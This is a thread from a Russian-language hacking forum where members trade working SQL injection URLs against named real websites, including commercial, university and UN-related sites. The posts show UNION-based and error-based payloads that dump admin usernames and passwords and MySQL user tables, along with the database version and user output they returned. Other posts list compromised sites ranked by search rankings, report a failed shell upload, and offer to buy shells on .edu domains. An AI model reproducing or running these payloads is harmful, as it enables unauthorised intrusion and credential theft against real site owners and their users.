SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://www.intline.ru/shwplans.php?oid=-15+union+select+1,group_concat%28concat_ws%280x3a,login,password%29+separator+0x0b%29,3,4,5+from+admin+--+
    version: 5.0.45-log
    database: inetproj
    user: intline@localhost

    тИЦ: 60 | PR: 3
    Страниц в Яндекс: 696
    IP: 195.178.216.41 /Moscow
    Reverse ip: intline.ru | mioo.ru

    Code:
    http://www.century21today.com/office.php?oID=-1+union+select+1,group_concat%28concat_ws%280x3a,username,password%29+separator+0x0b%29,3+from+adminaccounts+--+
    version: 5.1.44-community
    database: c21site
    user: idx@localhost

    PR: 2
    Страниц в Яндекс: 905
    IP: 216.55.163.25 /California
     
    #13881 mix0x0, 24 May 2011
    Last edited: 24 May 2011
  2. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    175
    Likes Received:
    250
    Reputations:
    27
    http://moskva.nightout.ru/vacancy/-3+union+select+1,2,3,4,5,6,group_concat(0x0b,host,0x3a,user,0x3a,password),8,9,10,11,12+from+mysql.user%20--
    http://moskva.nightout.ru/vacancy/-3+union+select+1,2,3,4,5,6,group_concat(0x0b,id,0x3a,login,0x3a,password),8,9,10,11,12+from+inday_concepton.user%20--
    File_Priv=Yes
     
  3. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://itc.virginia.edu/services/catServicesWithDesc.php?catID=0'union(select(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x))--+
     
    _________________________
    1 person likes this.
  4. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    насканил сегодня=)
     
    2 people like this.
  5. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    66
    Reputations:
    34
    [+]MySQL Info: [email protected]:5.0.90-log:u10283:binjportbld-freebsd7.3
    [+]Printable field: 9
    [+]Vuln URL: http://apcom.ru/ru/page/index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    pr 3 тиц 20
    5.0.51a-24+lenny5:usbgifts:u_usbgifts@localhost

    pr 1 тиц 10
    5.0.92-community:ecoberco_data:ecoberco_clreco@localhost

    pr 1 тиц 160
    5.1.55:baker018_db0:[email protected]
     
    _________________________
    #13886 winstrool, 27 May 2011
    Last edited: 6 Jun 2011
    2 people like this.
  7. Megwarez

    Megwarez Member

    Joined:
    7 May 2010
    Messages:
    33
    Likes Received:
    12
    Reputations:
    4
    PR2 DMOZ
    Code:
    http://www.moseleytennisclub.co.uk/story.php?id=-1+union+select+1,group_concat%280x0b,table_name%29,3,4+from+information_schema.tables+--
     
    #13887 Megwarez, 28 May 2011
    Last edited: 29 May 2011
  8. totenkopf

    totenkopf Elder - Старейшина

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
    Code:
    http://www.virtualracesystem.co.uk/webpage.php?PageID=-3+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9+--+
    [email protected]:4.0.27-max-log:db130187829
    
    Code:
    http://www.lightpollution.org.uk/index.php?pageId=-5+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16+--+
    admin@localhost:5.0.38-Ubuntu_0ubuntu1.4-log:lightPollution
    
    Code:
    http://www.congregationalinsurance.com/info_news.php?ID=185+AND+0+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12+--+
    dbo260186357@localhost:4.0.27-standard:db260186357
    
    Code:
    http://www.vernonmorris.co.uk/product-detail.php?category=2&id=17'/**/AND/**/0/**/UNION/**/SELECT/**/concat_ws(0x3a,user(),version(),database())/*
    p8urrows@localhost:5.0.27-community-nt:vernonmorris
    
    Code:
    http://www.knoydart.co.uk/display.php?category=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,binary(concat_ws(0x3a,user(),version(),database())),12,13,14,15+--+
    [email protected]:4.1.11-Debian_4sarge8:knoydart
    
    Code:
    http://www.tiller.co.uk/index.php?sid=courses&GET_crsID=-17'/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),version(),database())+--+'
    tiller_admin@localhost:5.0.92-community:tiller_awl
    
    Code:
    http://www.letmeplay.co.uk/content.php?sid=50'+AND+0+/*!union*/+/*!select*/+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8+--+
    amymat_admin@localhost:5.1.52:amymat_site
    
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    pr 2
    5.0.91-community:lesvoisl_lesvoisl:lesvoisl_lsvUSR@localhost

    pr 5
    4.0.17-standard-log:5152_web:user5152@localhost

    pr 3 тиц 50
    5.1.41-log:huntworld_bs:[email protected]

    pr 2 тиц 20
    5.1.54:asterisk:asterisk@localhost

    pr 1
    5.1.50-rel11.4-log:itkin:itkin@localhost
     
    _________________________
    1 person likes this.
  10. ManyMax

    ManyMax New Member

    Joined:
    27 May 2011
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    сорри за офтоп, готов покупать у вас шелы в зоне edu
     
    1 person likes this.
  11. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    И вновь хостинги!

    http://www.digiserv.biz/news/display_article.php?id=-36+union+select+1,user%28%29,3,4,5--+
     
    1 person likes this.
  12. MTV

    MTV New Member

    Joined:
    16 Feb 2011
    Messages:
    180
    Likes Received:
    2
    Reputations:
    0
    http://kitareview.com/news.php?id=589 есть скуля)Но не могу кол-во полей определить.Кавычку ставишь,все на новой странице открывается.Люди объясните?
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    http://kitareview.com/news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
     
    1 person likes this.
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    pr 3 тиц 70
    5.0.92-log:hotline_test11:hotline_base7802@localhost

    pr 1 тиц 10
    4.1.21-log:udb2156:Uwww2156S@localhost

    pr 1
    5.0.91-community-log:hillsrug_eberos:hillsrug_dba@localhost

    pr 4
    4.1.22:labio:labio@localhost

    pr 6 тиц 10
    164 таблици %)
    5.0.51a-24+lenny1:agsafe:agsafe@localhost

    pr 4
    5.0.51a-24+lenny1:bearcage:bearcage@localhost


    ROOT
    так и не смог сюда шелл залить
    pr5
    5.0.85:ausvet:angus@localhost

    pr 1
    5.0.32-Debian_7etch5~bpo31+1:freephone_dancek:[email protected]

    pr 4
    5.0.92-community:regplus_regplus:regplus_dbm@localhost

    pr 6
    5.0.84-0.dotdeb.0-log:FAQ_cfhss:fedcan2@localhost
     
    _________________________
    #13894 winstrool, 29 May 2011
    Last edited: 30 May 2011
    1 person likes this.
  15. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://www.marbel.ru/news/sob.php?id=44+and+1=0+union+select+1,2,3,database%28%29,version%28%29,6--
    тИц 80
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    pr 2ROOT
    прочтите вниматильней ошибку :D
    5.0.92-community:real_adminnewtemp:real_admin@rc3-int

    4.1.25-log:snarfy_main:snarfy_snarfy@localhost

    pr 3
    4.1.22-log:gateway2_cms:pantera@localhost
     
    _________________________
    #13896 winstrool, 30 May 2011
    Last edited: 30 May 2011
    1 person likes this.
  17. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Акция, интрнет визаут шит

    https://unfccc.int/cc_inet/cc_inet/six_elements/international_cooperation/items/3527.php?displayPool=-984+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,group_concat%28schema_name%29,31,32,33,34,35,36,37+from+information_schema.schemata--+&lang=10%27
     
  18. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Фуршет IVKI

    http://www.board.ivki.com/index.php?id_categ=-15%20and%201=2%20union%20select%201,2,3,4,5,6,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

    5.1.53-LOG [email protected] IVKI_BOARD PC-LINUX-GNU
     
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    pr 5 тиц 10
    4.0.26:pec_on_ca_simplecms:p[email protected]

    pr 1
    5.0.22-Debian_0ubuntu6.06.11-log:Eastview:Eastview@localhost

    pr 3
    5.0.92-community:ste_site:ste_web@localhost


    5.1.36-community-log:zoomprinting:root@localhost
     
    _________________________
  20. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://www.coshuk.com/html/news.php?ID=-47+UnIon+selECt+1,2,3,4,CONCAT%28user%28%29,%20CHAR%2832,45,32%29,%20version%28%29%29,6,7,8,9,10+--+

    coshadmin@localhost - 5.0.51a-community-log
     
Thread Status:
Not open for further replies.